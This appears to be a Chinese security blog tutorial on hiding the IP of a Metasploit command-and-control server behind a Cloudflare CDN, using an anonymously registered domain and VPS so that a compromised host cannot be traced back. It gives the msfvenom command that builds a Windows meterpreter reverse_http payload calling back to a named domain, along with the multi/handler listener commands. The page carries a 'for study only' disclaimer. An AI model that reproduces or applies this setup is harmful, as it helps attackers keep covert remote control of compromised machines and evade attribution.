当前位置:网站首页>Metasploit-域名上线隐藏IP
Metasploit-域名上线隐藏IP
2022-08-04 23:49:00 【曲折上升】
仅供学习使用,请勿用于非法途径,后果自负
Metasploit域名上线隐藏IP
概述
为什么要隐藏IP?
在拿下了目标机之后,目标机在内网里面,使用msf或者CS时,用自己的VPS做服务器的话,导致很容易被溯源。
域名上线原理
当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程,那么就意味这我们访问域名实际上最后是访问的真实IP。
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录。
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录。
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录。
TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录。
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录。
通过CDN上线MSF
CDN的全称是Content Delivery Network,即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层,将网站的内容发布到最接近用户的网络”边缘“的节点,目的提高用户访问网站的速度。

CDN上线具体实现
基础配置:一台VPS、一个域名,这里的VPS最好是匿名的
既然是隐藏自身 那么域名肯定不能使用自己备案的域名
https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册
https://cart.godaddy.com/ 注册匿名域名
https://www.cloudflare.com/ 免费CDN
购买好域名之后,进入cloudflare.com添加域名。

添加A记录。

返回https://cart.godaddy.com/进行入门指南的设置。



将所有的开关都关闭。编辑名称服务器,设置为cloudflare.com的名称服务器。
点击改变



检查是否配置成功。
ping下该域名,查看是否为vps的IP地址,不是的话则配置成功。

配置成功。
- MSF生成木马
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.zsyyme.info LPORT=2095 -f exe -o shell.exe

- MSF开启相对应监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost www.zsyyme.info
set lport 2095
run


- 用wireshark抓取流量即可!
边栏推荐
猜你喜欢

Xiaohei's leetcode journey: 95. Longest substring with at least K repeating characters

uniapp动态实现滑动导航效果demo(整理)
![[LeetCode] Summary of Matrix Simulation Related Topics](/img/80/bd71ca5211cce5805909015a642893.jpg)
[LeetCode] Summary of Matrix Simulation Related Topics

KT148A语音芯片怎么烧录语音进入芯片里面通过串口和电脑端的工具

小黑leetcode之旅:95. 至少有 K 个重复字符的最长子串

一、爬虫基本概念

SQL关联表更新

KT6368A Bluetooth certification problem_FCC and BQB_CE_KC certification or other instructions

Vscode连接远程服务器(一套配置成功)

Xiaohei leetcode surfing: 94. Inorder traversal of binary tree
随机推荐
生产者消费者问题
3. Actual combat---crawl the result page corresponding to Baidu's specified entry (a simple page collector)
对“为什么一些程序员很傲慢”的解读
【CVA估值训练营】财务建模指南——第一讲
2022年华数杯数学建模
Some thoughts on writing
小黑leetcode之旅:95. 至少有 K 个重复字符的最长子串
The role of @ Import annotations as well as how to use
App测试和Web测试的区别
NebulaGraph v3.2.0 Release Note,对查询最短路径的性能等多处优化
【七夕快乐篇】Nacos是如何实现服务注册功能的?
三、实战---爬取百度指定词条所对应的结果页面(一个简单的页面采集器)
@Import注解的作用以及如何使用
Ab3d.PowerToys and Ab3d.DXEngine Crack
2022 Niu Ke Summer Multi-School Training Camp 5 (BCDFGHK)
MYS-6ULX-IOT 开发板测评——使用 Yocto 添加软件包
Implementation principle of golang coroutine
招标公告 | 海纳百创公众号运维项目
从单体架构迁移到 CQRS 后,我觉得 DDD 并不可怕
truffle